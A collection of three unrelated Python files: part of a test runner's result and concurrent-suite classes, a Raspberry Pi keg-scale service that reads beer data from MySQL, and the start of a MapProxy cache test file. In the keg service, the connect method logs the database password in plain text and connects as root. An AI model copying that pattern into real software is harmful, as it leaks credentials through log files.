def get_testsuites_results_dict(self):
""" Return the test suites results dict """
return self.testsuitesresultsdict
###
def printResult(self, test, short, extended, colour_key=None, showruntime=True):
if self.no_colour_output:
colour = self.colours[None]
else:
colour = self.colours[colour_key]
if self.showAll:
self.stream.write(self.indent)
self.stream.write(colour(extended))
self.stream.write(" -- ")
self.stream.write(self.getShortDescription(test))
testruntime = 0
if self._is_test_of_type_ssttestcase(test):
testruntime = test.get_test_runtime_sec()
if showruntime:
self.stream.writeln(" [{0:.3f}s]".format(testruntime))
else:
self.stream.writeln(" ".format(testruntime))
self.stream.flush()
elif self.dots:
self.stream.write(colour(short))
self.stream.flush()
###
def addSuccess(self, test):
super(SSTTextTestResult, self).addSuccess(test)
#log_forced("DEBUG - addSuccess: Test = {0}\n".format(test))
self.printResult(test, '.', 'PASS', 'success')
if not self._is_test_of_type_ssttestcase(test):
return
self.testsuitesresultsdict.add_success(test)
def addError(self, test, err):
super(SSTTextTestResult, self).addError(test, err)
#log_forced("DEBUG - addError: Test = {0}, err = {1}\n".format(test, err))
self.printResult(test, 'E', 'ERROR', 'error')
if not self._is_test_of_type_ssttestcase(test):
return
self.testsuitesresultsdict.add_error(test)
_junit_test_case = getattr(self, '_junit_test_case', None)
if _junit_test_case is not None:
err_msg = self._get_err_info(err)
_junit_test_case.junit_add_error_info(err_msg)
def addFailure(self, test, err):
super(SSTTextTestResult, self).addFailure(test, err)
#log_forced("DEBUG - addFailure: Test = {0}, err = {1}\n".format(test, err))
self.printResult(test, 'F', 'FAIL', 'fail')
if not self._is_test_of_type_ssttestcase(test):
return
self.testsuitesresultsdict.add_failure(test)
_junit_test_case = getattr(self, '_junit_test_case', None)
if _junit_test_case is not None:
err_msg = self._get_err_info(err)
_junit_test_case.junit_add_failure_info(err_msg)
def addSkip(self, test, reason):
super(SSTTextTestResult, self).addSkip(test, reason)
#log_forced("DEBUG - addSkip: Test = {0}, reason = {1}\n".format(test, reason))
if not test_engine_globals.TESTENGINE_IGNORESKIPS:
self.printResult(test, 's', 'SKIPPED', 'skip', showruntime=False)
if not self._is_test_of_type_ssttestcase(test):
return
self.testsuitesresultsdict.add_skip(test)
_junit_test_case = getattr(self, '_junit_test_case', None)
if _junit_test_case is not None:
_junit_test_case.junit_add_skipped_info(reason)
def addExpectedFailure(self, test, err):
# NOTE: This is not a failure, but an identified pass
# since we are expecting a failure
super(SSTTextTestResult, self).addExpectedFailure(test, err)
#log_forced("DEBUG - addExpectedFailure: Test = {0}, err = {1}\n".format(test, err))
self.printResult(test, 'x', 'EXPECTED FAILURE', 'expected')
if not self._is_test_of_type_ssttestcase(test):
return
self.testsuitesresultsdict.add_expected_failure(test)
def addUnexpectedSuccess(self, test):
# NOTE: This is a failure, since we passed, but were expecting a failure
super(SSTTextTestResult, self).addUnexpectedSuccess(test)
#log_forced("DEBUG - addUnexpectedSuccess: Test = {0}\n".format(test))
self.printResult(test, 'u', 'UNEXPECTED SUCCESS', 'unexpected')
if not self._is_test_of_type_ssttestcase(test):
return
self.testsuitesresultsdict.add_unexpected_success(test)
_junit_test_case = getattr(self, '_junit_test_case', None)
if _junit_test_case is not None:
_junit_test_case.junit_add_failure_info("RECEIVED SUCCESS WHEN EXPECTING A FAILURE")
###
def printErrors(self):
if self.dots or self.showAll:
self.stream.writeln()
log("=" * 70)
log("=== TESTS FINISHED " + ("=" * 51))
log("=" * 70 + "\n")
if not test_engine_globals.TESTENGINE_IGNORESKIPS:
self.printSkipList('SKIPPED', self.skipped)
self.printErrorList('ERROR', self.errors)
self.printErrorList('FAIL', self.failures)
def printErrorList(self, flavour, errors):
if self.no_colour_output:
colour = self.colours[None]
else:
colour = self.colours[flavour.lower()]
for test, err in errors:
self.stream.writeln(self.separator1)
title = '%s: %s' % (flavour, self.getLongDescription(test))
self.stream.writeln(colour(title))
self.stream.writeln(self.separator2)
if pygments_loaded:
self.stream.writeln(highlight(err, self.lexer, self.formatter))
else:
self.stream.writeln(err)
def printSkipList(self, flavour, errors):
if self.no_colour_output:
colour = self.colours[None]
else:
colour = self.colours["skip"]
for test, err in errors:
title = '%s: %s' % (flavour, self.getLongDescription(test))
self.stream.writeln(colour(title))
if pygments_loaded:
self.stream.writeln(highlight(err, self.lexer, self.formatter))
else:
self.stream.writeln(err)
####
def _get_err_info(self, err):
"""Converts a sys.exc_info() into a string."""
exctype, value, tback = err
msg_lines = traceback.format_exception_only(exctype, value)
msg_lines = [x.replace('\n', ' ') for x in msg_lines]
return ''.join(msg_lines)
####
def _is_test_of_type_ssttestcase(self, test):
""" Detirmine if this is is within a valid SSTTestCase object by
checking if a unique SSTTestCase function exists
return: True if this is a test within a valid SSTTestCase object
"""
return getattr(test, 'get_testcase_name', None) is not None
################################################################################
# TestSuiteBaseClass will be either unitest.TestSuite or testtools.ConcurrentTestSuite
# and is defined at the top of this file.
class SSTTestSuite(TestSuiteBaseClass):
"""A TestSuite whose run() method can execute tests concurrently.
but also supports the python base unittest.TestSuite functionality.
This is a highly modified version of testtools.ConcurrentTestSuite
class to support startUpModuleConcurrent() & tearDownModuleConcurrent()
and to also support the limiting of parallel threads in flight.
This object will normally be derived from testtools.ConcurrentTestSuite
class, however, if the import of testtools failed, it will be derived from
unittest.TestSuite.
If the user selected concurrent mode is false, then it will always make
calls to the unittest.TestSuite class EVEN IF it is derived from
testtools.ConcurrentTestSuite, which is itself derived from unittest.TestSuite.
"""
def __init__(self, suite, make_tests, wrap_result=None):
"""Create a ConcurrentTestSuite or unittest.TestSuite to execute the suite.
Note: If concurrent mode is false, then it will always make calls to the
unittest.TestSuite class EVEN IF the class is derived from
testtools.ConcurrentTestSuite.
Args:
suite: A suite to run concurrently.
make_tests: A helper function to split the tests in the
ConcurrentTestSuite into some number of concurrently executing
sub-suites. make_tests must take a suite, and return an iterable
of TestCase-like object, each of which must have a run(result)
method. NOT USED IN unittest.TestSuite.
wrap_result: An optional function that takes a thread-safe
result and a thread number and must return a ``TestResult``
object. If not provided, then ``ConcurrentTestSuite`` will just
use a ``ThreadsafeForwardingResult`` wrapped around the result
passed to ``run()``. NOT USED IN unittest.TestSuite
"""
if not test_engine_globals.TESTENGINE_CONCURRENTMODE:
# Ignore make_tests and wrap_results
super(unittest.TestSuite, self).__init__(suite)
else:
super(SSTTestSuite, self).__init__(suite, make_tests, wrap_result)
####
def run(self, result):
"""Run the tests (possibly concurrently).
This calls out to the provided make_tests helper, and then serialises
the results so that result only sees activity from one TestCase at
a time.
ConcurrentTestSuite provides no special mechanism to stop the tests
returned by make_tests, it is up to the make_tests to honour the
shouldStop attribute on the result object they are run with, which will
be set if an exception is raised in the thread which
ConcurrentTestSuite.run() is called in.
NOTE: This is a highly modified version of the
testtools.ConcurrentTestSuite.run() method. It was changed to
support running a limited number of concurrent threads.
If concurrent mode is false, then it will always make calls to the
unittest.TestSuite class EVEN IF it is derived from
testtools.ConcurrentTestSuite.
"""
# Check to verify if we are NOT in concurrent mode, if so, then
# just call the run (this will be unittest.TestSuite's run())
if not test_engine_globals.TESTENGINE_CONCURRENTMODE:
return super(unittest.TestSuite, self).run(result)
# Perform the Concurrent Run
tests = self.make_tests(self)
thread_limit = test_engine_globals.TESTENGINE_THREADLIMIT
test_index = -1
try:
threads = {}
testqueue = Queue()
semaphore = threading.Semaphore(1)
test_iter = iter(tests)
test = "startup_placeholder"
tests_finished = False
while not tests_finished:
while len(threads) < thread_limit and test is not None:
#log_forced("DEBUG: CALLING FOR NEXT TEST; threads = {0}".format(len(threads)))
test = next(test_iter, None)
if result.shouldStop:
tests_finished = True
test_index += 1
#log_forced("DEBUG: TEST = {0}; index = {1}".format(test, test_index))
if test is not None:
process_result = self._wrap_result(testtools.\
ThreadsafeForwardingResult(result, semaphore), test_index)
reader_thread = threading.\
Thread(target=self._run_test, args=(test, process_result, testqueue))
threads[test] = reader_thread, process_result
reader_thread.start()
#log_forced("DEBUG: ADDED TEST = {0}; threads = {1}".\
#format(test, len(threads)))
if threads:
#log_forced("DEBUG: IN THREADS PROESSING")
finished_test = testqueue.get()
#log_forced("DEBUG: FINISHED TEST = {0}".format(finished_test))
threads[finished_test][0].join()
del threads[finished_test]
#log_forced("DEBUG: FINISHED TEST NUM THREADS = {0}".format(len(threads)))
#log_forced("DEBUG: FINISHED TEST THREADS keys = {0}".format(threads.keys()))
else:
tests_finished = True
test_engine_globals.TESTRUN_TESTRUNNINGFLAG = False
except:
for thread, process_result in threads.values():
process_result.stop()
raise
###
def _run_test(self, test, process_result, testqueue):
"""Support running a single test concurrently
NOTE: This is a slightly modified version of the
testtools.ConcurrentTestSuite._run_test() method. It was changed
to support running a limited number of calling the functions
setUpModuleConcurrent() and tearDownModuleConcurrent()
"""
try:
try:
setUpModuleConcurrent(test)
test_engine_globals.TESTRUN_TESTRUNNINGFLAG = True
test.run(process_result)
tearDownModuleConcurrent(test)
except Exception:
# The run logic itself failed.
case = testtools.ErrorHolder("broken-runner", error=sys.exc_info())
case.run(process_result)
finally:
testqueue.put(test)
################################################################################
class SSTTestSuiteResultData:
""" Support class to hold result data for a specific testsuite
Results are stored as lists of test names
"""
def __init__(self):
self._tests_passing = []
self._tests_failing = []
self._tests_errored = []
self._tests_skiped = []
self._tests_expectedfailed = []
self._tests_unexpectedsuccess = []
def add_success(self, test):
""" Add a test to the success record"""
self._tests_passing.append(test)
def add_failure(self, test):
""" Add a test to the failure record"""
self._tests_failing.append(test)
def add_error(self, test):
""" Add a test to the error record"""
self._tests_errored.append(test)
def add_skip(self, test):
""" Add a test to the skip record"""
self._tests_skiped.append(test)
def add_expected_failure(self, test):
""" Add a test to the expected failure record"""
self._tests_expectedfailed.append(test)
def add_unexpected_success(self, test):
""" Add a test to the unexpected success record"""
self._tests_unexpectedsuccess.append(test)
def get_passing(self):
""" Return the tests passing list"""
return self._tests_passing
def get_failed(self):
""" Return the tests failed list"""
return self._tests_failing
def get_errored(self):
""" Return the tests errored list"""
return self._tests_errored
def get_skiped(self):
""" Return the tests skipped list"""
return self._tests_skiped
def get_expectedfailed(self):
""" Return the expected failed list"""
return self._tests_expectedfailed
def get_unexpectedsuccess(self):
""" Return the tests unexpected success list"""
return self._tests_unexpectedsuccess
###
class SSTTestSuitesResultsDict:
""" Support class handle of dict of result data for all testsuites
"""
def __init__(self):
self.testsuitesresultsdict = {}
def add_success(self, test):
""" Add a testsuite and test to the success record"""
self._get_testresult_from_testmodulecase(test).add_success(test)
def add_failure(self, test):
""" Add a testsuite and test to the failure record"""
self._get_testresult_from_testmodulecase(test).add_failure(test)
def add_error(self, test):
""" Add a testsuite and test to the error record"""
self._get_testresult_from_testmodulecase(test).add_error(test)
def add_skip(self, test):
""" Add a testsuite and test to the skip record"""
self._get_testresult_from_testmodulecase(test).add_skip(test)
def add_expected_failure(self, test):
""" Add a testsuite and test to the expected failure record"""
self._get_testresult_from_testmodulecase(test).add_expected_failure(test)
def add_unexpected_success(self, test):
""" Add a testsuite and test to the unexpected success record"""
self._get_testresult_from_testmodulecase(test).add_unexpected_success(test)
def log_all_results(self):
""" Log all result catagories by testsuite """
# Log the data by key
for tmtc_name in self.testsuitesresultsdict:
log("\n{0}".format(tmtc_name))
for testname in self.testsuitesresultsdict[tmtc_name].get_passing():
log(" - PASSED : {0}".format(testname))
for testname in self.testsuitesresultsdict[tmtc_name].get_failed():
log(" - FAILED : {0}".format(testname))
for testname in self.testsuitesresultsdict[tmtc_name].get_errored():
log(" - ERROR : {0}".format(testname))
for testname in self.testsuitesresultsdict[tmtc_name].get_skiped():
log(" - SKIPPED : {0}".format(testname))
for testname in self.testsuitesresultsdict[tmtc_name].get_expectedfailed():
log(" - EXPECTED FAILED : {0}".format(testname))
for testname in self.testsuitesresultsdict[tmtc_name].get_unexpectedsuccess():
log(" - UNEXPECTED SUCCESS : {0}".format(testname))
def log_fail_error_skip_unexpeced_results(self):
""" Log non-success result catagories by testsuite """
# Log the data by key
for tmtc_name in self.testsuitesresultsdict:
# Dont log if everything passes
if len(self.testsuitesresultsdict[tmtc_name].get_failed()) == 0 and \
len(self.testsuitesresultsdict[tmtc_name].get_errored()) == 0 and \
len(self.testsuitesresultsdict[tmtc_name].get_expectedfailed()) == 0 and \
len(self.testsuitesresultsdict[tmtc_name].get_unexpectedsuccess()) == 0:
pass
else:
log("\n{0}".format(tmtc_name))
for testname in self.testsuitesresultsdict[tmtc_name].get_failed():
log(" - FAILED : {0}".format(testname))
for testname in self.testsuitesresultsdict[tmtc_name].get_errored():
log(" - ERROR : {0}".format(testname))
for testname in self.testsuitesresultsdict[tmtc_name].get_expectedfailed():
log(" - EXPECTED FAILED : {0}".format(testname))
for testname in self.testsuitesresultsdict[tmtc_name].get_unexpectedsuccess():
log(" - UNEXPECTED SUCCESS : {0}".format(testname))
def _get_testresult_from_testmodulecase(self, test):
tm_tc = self._get_test_module_test_case_name(test)
if tm_tc not in self.testsuitesresultsdict.keys():
self.testsuitesresultsdict[tm_tc] = SSTTestSuiteResultData()
return self.testsuitesresultsdict[tm_tc]
def _get_test_module_test_case_name(self, test):
return "{0}.{1}".format(self._get_test_module_name(test),
self._get_test_case_name(test))
def _get_test_case_name(self, test):
return strqual(test.__class__)
def _get_test_module_name(self, test):
return strclass(test.__class__)
|
kegdata.py
|
#!/usr/bin/python
# coding: UTF-8
# kegdata service to read about key status
# Written by: Ron Ritchey
from __future__ import unicode_literals
import json, threading, logging, Queue, time, getopt, sys, logging, datetime
import RPi.GPIO as GPIO
import pymysql.cursors
from hx711 import HX711
# HOW TO CALCULATE THE REFFERENCE UNIT
# To set the reference unit to 1. Put 1kg on your sensor or anything you have and know exactly how much it weights.
# In this case, 92 is 1 gram because, with 1 as a reference unit I got numbers near 0 without any weight
# and I got numbers around 184000 when I added 2kg. So, according to the rule of thirds:
# If 2000 grams is 184000 then 1000 grams is 184000 / 2000 = 92.
#hx.set_reference_unit(1)
#hx.set_reference_unit(92)
#hx.set_reference_unit(10772)
class kegdata():
kegdata_init = {
'name':'',
'description':'',
'abv':0.0,
'ibu':0.0,
'originalgravity':0.0,
'finalgravity':0.0,
'color':0.0,
'kegged':datetime.datetime.fromtimestamp(0),
'tapped':datetime.datetime.fromtimestamp(0),
'brewed':datetime.datetime.fromtimestamp(0),
'notes':'',
'weight':0.0,
}
varcheck = {
u'unicode':
[
u'name',
u'description',
u'notes'
],
u'int':
[
u'weight',
],
u'float':
[
u'abv',
u'ibu',
u'originalgravity',
u'finalgravity',
u'color'
],
u'datetime.datetime':
[
u'kegged',
u'tapped',
u'brewed',
]
}
def __init__(self, q, server, port, pwd, tap):
self.dataqueue = q
self.kegdata = self.kegdata_init
self.kegdata_prev = { }
self.server = server
self.port = port
self.pwd = pwd
self.tap = tap
self.connection_failed = 0
self.dataclient = None
print "Initializing keg data service"
self.hx = HX711(25,24)
self.hx.set_reading_format("LSB", "MSB")
self.hx.set_reference_unit(673)
self.hx.reset()
self.hx.tare()
# Now set up a thread to listen to the channel and update our data when
# the channel indicates a relevant key has changed
data_t = threading.Thread(target=self.run)
data_t.daemon = True
data_t.start()
def validatekegvars(self, vars):
for vtype, members in self.varcheck.iteritems():
if vtype == u'unicode':
for v in members:
try:
if type(vars[v]) is unicode:
continue
if type(vars[v]) is None:
vars[v] = u""
elif type(vars[v]) is str:
logging.debug(u"Received string in {0}. Converting to Unicode".format(v))
vars[v] = vars[v].decode()
else:
# This happens so often when playing from webradio that I'm disabling logging for now.
# logging.debug(u"Received non-string type {0} in {1}. Converting to null".format(type(vars[v]),v))
vars[v] = u""
except KeyError:
logging.debug(u"Missing required value {0}. Adding empty version".format(v))
vars[v] = u""
elif vtype == u'bool':
for v in members:
try:
if type(vars[v]) is bool:
continue
if type(vars[v]) is None:
vars[v] = False
elif type(vars[v]) is int:
logging.debug(u"Received integer in {0}. Converting to boolean".format(v))
vars[v] = bool(vars[v])
else:
logging.debug(u"Received non-bool type {0} in {1}. Converting to False".format(type(vars[v]),v))
vars[v] = False
except KeyError:
logging.debug(u"Missing required value {0}. Adding empty version".format(v))
vars[v] = False
elif vtype == u'int':
for v in members:
try:
if type(vars[v]) is int:
continue
if type(vars[v]) is None:
vars[v] = 0
elif type(vars[v]) is bool:
logging.debug(u"Received boolean in {0}. Converting to integer".format(v))
vars[v] = int(vars[v])
else:
logging.debug(u"Received non-integer type {0} in {1}. Converting to 0".format(type(vars[v]),v))
vars[v] = 0
except KeyError:
logging.debug(u"Missing required value {0}. Adding empty version".format(v))
vars[v] = 0
elif vtype == u'datetime.datetime':
for v in members:
try:
if type(vars[v]) is datetime.datetime:
continue
if type(vars[v]) is None:
vars[v] = datetime.datetime.fromtimestamp(0)
else:
logging.debug(u"Received non-datetime type {0} in {1}. Converting to empty date".format(type(vars[v]),v))
vars[v] = datetime.datetime.fromtimestamp(0)
except KeyError:
logging.debug(u"Missing required value {0}. Adding empty version".format(v))
vars[v] = datetime.datetime.fromtimestamp(0)
def connect(self):
# Try up to 10 times to connect to REDIS
self.connection_failed = 0
logging.debug(u"Connecting to mySQL service on {0}:{1}".format(self.server, self.port))
while True:
if self.connection_failed >= 10:
logging.debug(u"Could not connect to mySQL service")
raise RuntimeError(u"Could not connect to mySQL service")
try:
# Connection to mySQL
logging.debug("Connecting to {0} with password {1}".format(self.server, self.pwd))
conn = pymysql.connect(host=self.server,
db='pydKeg',
user='root',
charset='utf8',
password=self.pwd,
autocommit=True,
cursorclass=pymysql.cursors.DictCursor)
if conn.open:
logging.debug('Connected to MySQL database')
self.dataclient = conn
break
except:
raise
self.dataclient = None
self.connection_failed += 1
time.sleep(1)
#
# def subscribe(self):
# # Try to subscribe. If you fail, reconnect and try again.
# # If you fail, allow the resulting exception to be passed on.
#
# try:
# # Create a pubsub to receive messages
# self.pubsub = self.dataclient.pubsub(ignore_subscribe_messages=True)
#
# # Subscribe to act_player_info keyspace events
# self.pubsub.psubscribe(u'__key*__:act_player_info')
# except redis.ConnectionError:
# self.connect()
#
# # Try again to subscribe
# # Create a pubsub to receive messages
# self.pubsub = self.dataclient.pubsub(ignore_subscribe_messages=True)
#
# # Subscribe to act_player_info keyspace events
# self.pubsub.subscribe(u'__key*__:act_player_info')
def run(self):
logging.debug(u"kegdata service starting")
while True:
if self.dataclient is None:
try:
# Try to connect
self.connect()
self.status()
self.sendUpdate()
except (RuntimeError):
self.dataclient = None
# On connection error, sleep 5 and then return to top and try again
time.sleep(5)
continue
try:
self.status()
self.sendUpdate()
time.sleep(5)
except (RuntimeError):
# if we lose our connection while trying to query DB
# sleep 5 and then return to top to try again
self.dataclient = None
logging.debug(u"Could not get status from mySQL service")
time.sleep(5)
continue
def status(self):
# Read kegplayer status and update kegdata
cursor = self.dataclient.cursor()
cursor.execute("SELECT Beer FROM Tap WHERE Tap.Tap = %s", (self.tap) )
row = cursor.fetchone()
if row is not None:
Beer = row['Beer']
else:
Beer = ''
cursor.execute("SELECT * FROM Beer WHERE Beer.idBeer = %s", (Beer))
row = cursor.fetchone()
if row is not None:
# Update keg variables
self.kegdata[u'name'] = row['Name'] if 'Name' in row else u''
self.kegdata[u'description'] = row['Description'] if 'Description' in row else u''
self.kegdata[u'abv'] = row['ABV'] if 'ABV' in row else 0.0
self.kegdata[u'ibu'] = row['IBU'] if 'IBU' in row else 0.0
self.kegdata[u'originalgravity'] = row['OriginalGravity'] if 'OriginalGravity' in row else 0.0
self.kegdata[u'finalgravity'] = row['FinalGravity'] if 'FinalGravity' in row else 0.0
self.kegdata[u'color'] = row['Color'] if 'Color' in row else 0.0
self.kegdata[u'kegged'] = row['Kegged'] if 'Kegged' in row else datetime.datetime.fromtimestamp(0)
self.kegdata[u'tapped'] = row['Tapped'] if 'Tapped' in row else datetime.datetime.fromtimestamp(0)
self.kegdata[u'brewed'] = row['Tapped'] if 'Tapped' in row else datetime.datetime.fromtimestamp(0)
self.kegdata[u'notes'] = row['Notes'] if 'Notes' in row else u''
else:
self.kegdata[u'name'] = u''
self.kegdata[u'description'] = u''
self.kegdata[u'abv'] = 0.0
self.kegdata[u'ibu'] = 0.0
self.kegdata[u'originalgravity'] = 0.0
self.kegdata[u'finalgravity'] = 0.0
self.kegdata[u'color'] = 0.0
self.kegdata[u'kegged'] = datetime.datetime.fromtimestamp(0)
self.kegdata[u'tapped'] = datetime.datetime.fromtimestamp(0)
self.kegdata[u'brewed'] = datetime.datetime.fromtimestamp(0)
self.kegdata[u'notes'] = u''
self.kegdata[u'weight'] = int(self.hx.get_weight(10))
print "Weight is {0} in oz".format(self.kegdata[u'weight'])
self.hx.power_down()
self.hx.power_up()
self.validatekegvars(self.kegdata)
def sendUpdate(self):
# Figure out what has changed and then send just those values across dataqueue
md = { }
for k, v in self.kegdata.iteritems():
pv = self.kegdata_prev[k] if k in self.kegdata_prev else None
if pv != v:
md[k] = v
# Send md to queue if anything has changed
if len(md) > 0:
# # elapsed is special as it needs to be sent to guarantee that the timer gets updated correctly. Even if it hasn't changed, send it anyway
# md[u'elapsed'] = self.kegdata[u'elapsed']
self.dataqueue.put(md)
# Update kegdata_prev
self.kegdata_prev = self.kegdata.copy()
if __name__ == u'__main__':
logging.basicConfig(format='%(asctime)s:%(levelname)s:%(message)s', filename=u'kegdata.log', level=logging.DEBUG)
logging.getLogger().addHandler(logging.StreamHandler())
try:
opts, args = getopt.getopt(sys.argv[1:],u"hs:p:w:t:",[u"server=",u"port=",u"pwd=",u"tap="])
except getopt.GetoptError:
print u'kegdata.py -s <server> -p <port> -w <password> -t <tap>'
sys.exit(2)
# Set defaults
server = u'localhost'
port = 3306
pwd= u''
tap = 1
for opt, arg in opts:
if opt == u'-h':
print u'kegdata.py -s <server> -p <port> -w <password> -t <tap>'
sys.exit()
elif opt in (u"-s", u"--server"):
server = arg
elif opt in (u"-p", u"--port"):
port = arg
elif opt in (u"-w", u"--pwd"):
pwd = arg
elif opt in (u"-t", u"--tap"):
tap = int(arg)
import sys
print "kegdata test\n server: {0}\n port : {1}\n tap : {2}\n".format(server,port,tap)
q = Queue.Queue()
kd = kegdata(q, server, port, pwd, tap)
try:
start = time.time()
while True:
if start+120 < time.time():
break;
try:
item = q.get(timeout=1000)
print u"++++++++++"
for k,v in item.iteritems():
print u"[{0}] '{1}' type {2}".format(k,v,type(v))
print u"++++++++++"
print
q.task_done()
except Queue.Empty:
pass
except KeyboardInterrupt:
print u''
pass
print u"Exiting..."
|
test_cache.py
|
# This file is part of the MapProxy project.
# Copyright (C) 2010 Omniscale <http://omniscale.de>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import with_statement
import os
import re
import time
import threading
import shutil
import tempfile
import base64
from io import BytesIO
from mapproxy.compat.image import Image
from mapproxy.layer import (
CacheMapLayer,
SRSConditional,
ResolutionConditional,
DirectMapLayer,
MapExtent,
MapQuery,
)
from mapproxy.source import InvalidSourceQuery, SourceError
from mapproxy.client.wms import WMSClient
from mapproxy.source.wms import WMSSource
from mapproxy.source.tile import TiledSource
from mapproxy.cache.base import TileLocker
from mapproxy.cache.file import FileCache
from mapproxy.cache.tile import Tile, TileManager
from mapproxy.grid import TileGrid, resolution_range
from mapproxy.srs import SRS
from mapproxy.client.http import HTTPClient
from mapproxy.image import ImageSource
from mapproxy.image.opts import ImageOptions
from mapproxy.layer import BlankImage, MapLayer, MapBBOXError
from mapproxy.request.wms import WMS111MapRequest
from mapproxy.util.coverage import BBOXCoverage
from mapproxy.test.image import create_debug_img, is_png, tmp_image
from mapproxy.test.http import assert_query_eq, wms_query_eq, query_eq, mock_httpd
from collections import defaultdict
from nose.tools import eq_, raises, assert_not_equal, assert_raises
TEST_SERVER_ADDRESS = ('127.0.0.1', 56413)
GLOBAL_GEOGRAPHIC_EXTENT = MapExtent((-180, -90, 180, 90), SRS(4326))
tmp_lock_dir = None
def setup():
global tmp_lock_dir
tmp_lock_dir = tempfile.mkdtemp()
def teardown():
shutil.rmtree(tmp_lock_dir)
class counting_set(object):
def __init__(self, items):
self.data = defaultdict(int)
for item in items:
self.data[item] += 1
def add(self, item):
self.data[item] += 1
def __repr__(self):
return 'counting_set(%r)' % dict(self.data)
def __eq__(self, other):
return self.data == other.data
class MockTileClient(object):
def __init__(self):
self.requested_tiles = []
def get_tile(self, tile_coord, format=None):
self.requested_tiles.append(tile_coord)
return ImageSource(create_debug_img((256, 256)))
class TestTiledSourceGlobalGeodetic(object):
def setup(self):
self.grid = TileGrid(SRS(4326), bbox=[-180, -90, 180, 90])
self.client = MockTileClient()
self.source = TiledSource(self.grid, self.client)
def test_match(self):
self.source.get_map(MapQuery([-180, -90, 0, 90], (256, 256), SRS(4326)))
self.source.get_map(MapQuery([0, -90, 180, 90], (256, 256), SRS(4326)))
eq_(self.client.requested_tiles, [(0, 0, 1), (1, 0, 1)])
@raises(InvalidSourceQuery)
def test_wrong_size(self):
self.source.get_map(MapQuery([-180, -90, 0, 90], (512, 256), SRS(4326)))
@raises(InvalidSourceQuery)
def test_wrong_srs(self):
self.source.get_map(MapQuery([-180, -90, 0, 90], (512, 256), SRS(4326)))
class MockFileCache(FileCache):
def __init__(self, *args, **kw):
super(MockFileCache, self).__init__(*args, **kw)
self.stored_tiles = set()
self.loaded_tiles = counting_set([])
def store_tile(self, tile):
assert tile.coord not in self.stored_tiles
self.stored_tiles.add(tile.coord)
if self.cache_dir != '/dev/null':
FileCache.store_tile(self, tile)
def load_tile(self, tile, with_metadata=False):
self.loaded_tiles.add(tile.coord)
return FileCache.load_tile(self, tile, with_metadata)
def is_cached(self, tile):
return tile.coord in self.stored_tiles
def create_cached_tile(tile, cache, timestamp=None):
loc = cache.tile_location(tile, create_dir=True)
with open(loc, 'wb') as f:
f.write(b'foo')
if timestamp:
os.utime(loc, (timestamp, timestamp))
class TestTileManagerStaleTiles(object):
def setup(self):
self.cache_dir = tempfile.mkdtemp()
self.file_cache = FileCache(cache_dir=self.cache_dir, file_ext='png')
self.grid = TileGrid(SRS(4326), bbox=[-180, -90, 180, 90])
self.client = MockTileClient()
self.source = TiledSource(self.grid, self.client)
self.locker = TileLocker(tmp_lock_dir, 10, "id")
self.tile_mgr = TileManager(self.grid, self.file_cache, [self.source], 'png', locker=self.locker)
def teardown(self):
shutil.rmtree(self.cache_dir)
def test_is_stale_missing(self):
assert not self.tile_mgr.is_stale(Tile((0, 0, 1)))
def test_is_stale_not_expired(self):
create_cached_tile(Tile((0, 0, 1)), self.file_cache)
assert not self.tile_mgr.is_stale(Tile((0, 0, 1)))
def test_is_stale_expired(self):
create_cached_tile(Tile((0, 0, 1)), self.file_cache, timestamp=time.time()-3600)
self.tile_mgr._expire_timestamp = time.time()
assert self.tile_mgr.is_stale(Tile((0, 0, 1)))
class TestTileManagerRemoveTiles(object):
def setup(self):
self.cache_dir = tempfile.mkdtemp()
self.file_cache = FileCache(cache_dir=self.cache_dir, file_ext='png')
self.grid = TileGrid(SRS(4326), bbox=[-180, -90, 180, 90])
self.client = MockTileClient()
self.source = TiledSource(self.grid, self.client)
self.image_opts = ImageOptions(format='image/png')
self.locker = TileLocker(tmp_lock_dir, 10, "id")
self.tile_mgr = TileManager(self.grid, self.file_cache, [self.source], 'png',
image_opts=self.image_opts,
locker=self.locker)
def teardown(self):
shutil.rmtree(self.cache_dir)
def test_remove_missing(self):
self.tile_mgr.remove_tile_coords([(0, 0, 0), (0, 0, 1)])
def test_remove_existing(self):
create_cached_tile(Tile((0, 0, 1)), self.file_cache)
assert self.tile_mgr.is_cached(Tile((0, 0, 1)))
self.tile_mgr.remove_tile_coords([(0, 0, 0), (0, 0, 1)])
assert not self.tile_mgr.is_cached(Tile((0, 0, 1)))
class TestTileManagerTiledSource(object):
def setup(self):
self.file_cache = MockFileCache('/dev/null', 'png', lock_dir=tmp_lock_dir)
self.grid = TileGrid(SRS(4326), bbox=[-180, -90, 180, 90])
self.client = MockTileClient()
self.source = TiledSource(self.grid, self.client)
self.image_opts = ImageOptions(format='image/png')
self.locker = TileLocker(tmp_lock_dir, 10, "id")
self.tile_mgr = TileManager(self.grid, self.file_cache, [self.source], 'png',
image_opts=self.image_opts,
locker=self.locker,
)
def test_create_tiles(self):
self.tile_mgr.creator().create_tiles([Tile((0, 0, 1)), Tile((1, 0, 1))])
eq_(self.file_cache.stored_tiles, set([(0, 0, 1), (1, 0, 1)]))
eq_(sorted(self.client.requested_tiles), [(0, 0, 1), (1, 0, 1)])
class TestTileManagerDifferentSourceGrid(object):
def setup(self):
self.file_cache = MockFileCache('/dev/null', 'png', lock_dir=tmp_lock_dir)
self.grid = TileGrid(SRS(4326), bbox=[-180, -90, 180, 90])
self.source_grid = TileGrid(SRS(4326), bbox=[0, -90, 180, 90])
self.client = MockTileClient()
self.source = TiledSource(self.source_grid, self.client)
self.image_opts = ImageOptions(format='image/png')
self.locker = TileLocker(tmp_lock_dir, 10, "id")
self.tile_mgr = TileManager(self.grid, self.file_cache, [self.source], 'png',
image_opts=self.image_opts,
locker=self.locker,
)
def test_create_tiles(self):
self.tile_mgr.creator().create_tiles([Tile((1, 0, 1))])
eq_(self.file_cache.stored_tiles, set([(1, 0, 1)]))
eq_(self.client.requested_tiles, [(0, 0, 0)])
@raises(InvalidSourceQuery)
def test_create_tiles_out_of_bounds(self):
self.tile_mgr.creator().create_tiles([Tile((0, 0, 0))])
class MockSource(MapLayer):
def __init__(self, *args):
MapLayer.__init__(self, *args)
self.requested = []
def _image(self, size):
return create_debug_img(size)
def get_map(self, query):
self.requested.append((query.bbox, query.size, query.srs))
